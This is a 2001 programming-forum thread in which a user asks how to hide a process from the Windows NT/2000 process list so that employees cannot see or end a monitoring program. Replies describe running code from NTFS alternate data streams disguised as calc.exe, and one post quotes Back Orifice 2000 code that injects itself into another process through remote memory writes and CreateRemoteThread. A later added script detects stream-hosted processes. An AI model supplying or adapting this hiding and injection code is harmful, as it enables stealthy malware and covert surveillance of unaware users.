
Hide App In Process List in NT / w2k?

  • Hide App In Process List in NT / w2k?

    Anyone know how? I don't want the process to show at all.

    ------------------
    -Greg
    [email protected]
    MCP,MCSA,MCSE,MCSD

  • #2
    You can use RegisterServiceProcess to hide it from the Task List, but you can't hide from the Process List as such - at least, not if you're a running process
    but have a look through Semen's posts, he's written a couple of amazing DLLs that inject into already-running processes. You could also make a DLL that is loaded by a system process, but that may also be tricky. Another option is to make a base service provider - e.g. DLLs registered with Regsvr32.exe, they're always running but never show in the process list
    in Win98 you can 'patch' the Toolhelp APIs to render your process hidden, but it can't be applied to NT/2K
    One thing you can do however, is to run your program from a stream. For example, copy it across to c:\winnt\calc.exe:mystream
    You've got two files in one - calc.exe (MS Calc), and calc.exe:mystream (your prog). You can't use Start | Run to execute streams, but you can do it programmatically using a call to ShellExecute()
    Then look at your process list - you'll just see "calc.exe" but you won't see "calc.exe:mystream", even though that's what is actually running. This is only a visual deception though, as the process list APIs still reveal the full path, it's just that Task Manager for some reason chooses to ignore the stream segment of the filename

    Best of luck!
    Wayne


    ------------------
    -
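Post #2 points out that the process list APIs still report the full image path, stream name included, even though Task Manager drops it. The check below is an added example (not code from the thread) that uses that fact for detection: given (PID, image path) pairs from any process enumeration, it flags images whose file name carries an alternate data stream. The sample paths are constructed, and `stream_of` and `flag_stream_images` are hypothetical helper names.

```python
import re

# Leading parts of a Windows path that may legitimately contain a colon:
# an optional \\?\, \\.\ or \??\ prefix, then an optional drive letter.
_PREFIX = re.compile(
    r'^(?:\\\\\?\\|\\\\\.\\|\\\?\?\\)?'
    r'(?:[A-Za-z]:)?'
)

def stream_of(image_path):
    """Return the named stream in the last path component, or None.

    NTFS stream syntax is name:stream[:type]. The unnamed default stream
    (name::$DATA) is the file's ordinary contents, so it is not flagged.
    Assumes a full path as reported by process enumeration.
    """
    rest = _PREFIX.sub('', image_path, count=1)
    leaf = re.split(r'[\\/]', rest)[-1]
    parts = leaf.split(':')
    if len(parts) < 2:
        return None          # no colon in the file name: no stream
    return parts[1] or None  # empty name means the default stream

def flag_stream_images(processes):
    """Return (pid, path, stream) for every image running from a stream."""
    flagged = []
    for pid, path in processes:
        stream = stream_of(path)
        if stream:
            flagged.append((pid, path, stream))
    return flagged

# Constructed sample data: (PID, image path) pairs.
SAMPLE = [
    (412,  r'C:\WINNT\system32\services.exe'),
    (1180, r'c:\winnt\calc.exe:mystream'),
    (1200, r'\\?\C:\WINNT\notepad.exe'),
    (1316, r'\Device\HarddiskVolume1\WINNT\calc.exe:mystream:$DATA'),
    (1400, r'C:\WINNT\explorer.exe::$DATA'),
]

if __name__ == '__main__':
    for pid, path, stream in flag_stream_images(SAMPLE):
        print(f'PID {pid}: {path} runs from stream "{stream}"')
```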



    • #3
      From www.sourceforge.net/projects/bo2k
      Code:
      if(g_bIsWinNT) {  //---------------------- WINDOWS NT PROCESS HIDE -------------------
      		// -------------------------------------------------------
      		// -- Process Hiding Code                               
      		// -- Note that there are several different ways to do  
      		// -- what this code does. Both of the methods presented
      		// -- below were written specifically to avoid accessing
      		// -- the original BO2K image on disk.
      		// -- This way, the original BO2K disk file can be compressed
      		// -- with all of the plugin attachments inside, and
      		// -- the original executable can be moved around/deleted
      		// -- while the BO2K server still runs.
      		
      		// Get another process and thread id
      		PROCESSINFO *ppie,*ppi=CreateProcListSnapshot(NULL);
      		DWORD dwThreadID, dwProcID;
      		
      		for(ppie=ppi;ppie!=NULL;ppie=ppie->next) {
      			if(lstrcmpi(ppie->svApp,svProcess)==0) break;
      		}
      		if(ppie==NULL) return FALSE;
      		
      		dwProcID=ppie->dwProcID;
      		dwThreadID=ppie->pThread->dwThreadID; // Get first thread (doesn't really matter)
      		
      		DestroyProcListSnapshot(ppi);
      		
      		// Make sure we aren't hopping into ourselves
      		if(GetCurrentProcessId()==dwProcID) return FALSE;
      
      		// Open process to inject code into
      		HANDLE hProc=OpenProcess(PROCESS_ALL_ACCESS,FALSE,dwProcID);
      		if(hProc==NULL) {
      			DebugMessageBox(NULL,"Unable to open process","ERROR",MB_SETFOREGROUND);
      			return FALSE;
      		}
      		
      		// Free space for BO2K (in case we are restarting)
      		pVirtualFreeEx(hProc,g_module,0,MEM_RELEASE);
      		
      		// Allocate space for BO2K to fit in the process
      		DWORD dwSize=((PIMAGE_OPTIONAL_HEADER)OPTHDROFFSET(g_module))->SizeOfImage;
      		char *pMem=(char *)pVirtualAllocEx(hProc,g_module,dwSize,MEM_COMMIT|MEM_RESERVE,PAGE_EXECUTE_READWRITE);
      		if(pMem==NULL) {
      			DebugMessageBox(NULL,"Couldn't VirtualAllocEx","Error",MB_SETFOREGROUND);
      			return FALSE;
      		}
      		
      		// Lets copy the entire bo2k process into this space.
      		DWORD dwOldProt,dwNumBytes,i;
      		MEMORY_BASIC_INFORMATION mbi;
      		
      		pVirtualQueryEx(hProc,pMem,&mbi,sizeof(MEMORY_BASIC_INFORMATION));
      		while(mbi.Protect!=PAGE_NOACCESS && mbi.RegionSize!=0) {
      			if(!(mbi.Protect & PAGE_GUARD)) {
      				for(i=0;i<mbi.RegionSize;i+=0x1000) {
      					pVirtualProtectEx(hProc,pMem+i,0x1000,PAGE_EXECUTE_READWRITE,&dwOldProt);
      					WriteProcessMemory(hProc,pMem+i,pMem+i,0x1000,&dwNumBytes);
      				}
      			}
      			
      			pMem+=mbi.RegionSize;
      			pVirtualQueryEx(hProc,pMem,&mbi,sizeof(MEMORY_BASIC_INFORMATION));	
      		}
      		
      		// Create a remote thread in the other process
      		DWORD dwRmtThdID;
      		HANDLE hRmtThd=pCreateRemoteThread(hProc,NULL,0,EntryPoint,(LPVOID)g_module,0,&dwRmtThdID);
      		if(hRmtThd==NULL) {
      			DebugMessageBox(NULL,"Could create remote thread","ERROR",MB_SETFOREGROUND);
      			return FALSE;
      		}
      		
      		CloseHandle(hProc);
      		return 0;
      ------------------
      Sven Blumenstein
      IT-Trainee at DECOMA Exterior Systems, Germany
      E-Mail: [email protected][NOSPAM]cycos.net
      Programming with: PB/DLL, MASM, VB, VC++, LCC, VBA, WML



      • #4
        But... but... it's C++


        [This message has been edited by Wayne Diamond (edited October 15, 2001).]
        -



        • #5
          Sven,

          Any help in converting to PB? Haven't programmed in C++ since
          high school.

          ------------------
          -Greg
          [email protected]
          MCP,MCSA,MCSE,MCSD



          • #6
            I know just enough C++ to install Visual Studio, sorry I can't help more with that

            ------------------
            -



            • #7
              I just gotta ask:

              Why hide the process from the task list at all?

              In fact, why even hide the process from the task bar?

              My view: If it's a process, let it behave like a process, for crying out loud.

              If you don't want to spawn a second process, put it in a separate thread of execution!

              (I'm sure someone will give me a reasonable explanation of this penchant for hiding things).

              MCM


              Michael Mattias
              Tal Systems (retired)
              Port Washington WI USA
              [email protected]
              http://www.talsystems.com



              • #8
                Well, my app is for Management auditing, they want to see how much
                time each window is active for a given user. They don't want
                the user trying to end the task though.

                ------------------
                -Greg
                [email protected]
                MCP,MCSA,MCSE,MCSD



                • #9
                  > Well, my app is for Management auditing, they want to see how much
                  > time each window is active for a given user. They don't want
                  > the user trying to end the task though.

                  How does keeping a process off the task list aid this?

                  Besides, you can track how much time a user spends in each Window easily enough by trapping the WM_SETFOCUS and WM_KILLFOCUS messages.

                  MCM


                  Michael Mattias
                  Tal Systems (retired)
                  Port Washington WI USA
                  [email protected]
                  http://www.talsystems.com



                  • #10
                    Michael,

                    I seem confused. How does trapping WM_SETFOCUS and WM_KILLFOCUS
                    on my app track usage on all apps on the user's workstation?

                    Getting the time is the easy part, I just need help hiding
                    the app from the process list in NT.

                    ------------------
                    -Greg

                    [This message has been edited by Gregery D Engle (edited October 15, 2001).]
                    -Greg
                    [email protected]
                    MCP,MCSA,MCSE,MCSD



                    • #11
                      > I seem confused. How does trapping WM_SETFOCUS and WM_KILLFOCUS
                      > on my app track usage on all apps on the user's workstation?

                      Well, you've confused me. You said,

                      > Well, my app is for Management auditing, they want to see how much
                      > time each window is active for a given user...

                      There's a difference between how much time one spends in a window (which I interpreted as "time spent in any given window of a given application") and how much time users spend in any given application of a suite of different applications.

                      To answer your question, trapping messages in any one application does nothing for logging time across multiple applications.

                      FWIW, there's probably some "hook process" method to trap messages across applications, though.

                      But I digress ... or do I? What does hiding a process from the task list have to do with logging the time spent using that process?

                      MCM

                      Michael Mattias
                      Tal Systems (retired)
                      Port Washington WI USA
                      [email protected]
                      http://www.talsystems.com



                      • #12
                        > What does hiding a process from the task list
                        > have to do with logging the time spent using
                        > that process?

                        Nothing, at least not directly. But it keeps the user (who is being monitored) from using the Windows Task Manager to end-task the program that is doing the monitoring. In fact it makes it so that the program can't be easily detected by the user in the first place.

                        -- Eric


                        ------------------
                        Perfect Sync Development Tools
                        Perfect Sync Web Site
                        Contact Us: [email protected]
                        "Not my circus, not my monkeys."



                        • #13
                          Thanks Eric!

                          ------------------
                          -Greg
                          [email protected]
                          MCP,MCSA,MCSE,MCSD



                          • #14
                            > .. it keeps the user (who is being monitored) from using the Windows Task Manager to end-task the program that is doing the monitoring. In fact it makes it so that the program can't be easily detected by the user in the first place.

                            OK, now I understand. The "time" considerations are indirect. The real challenge is preventing unauthorized task termination!

                            I knew there had to be some kind of reason.

                            MCM

                            Michael Mattias
                            Tal Systems (retired)
                            Port Washington WI USA
                            [email protected]
                            http://www.talsystems.com
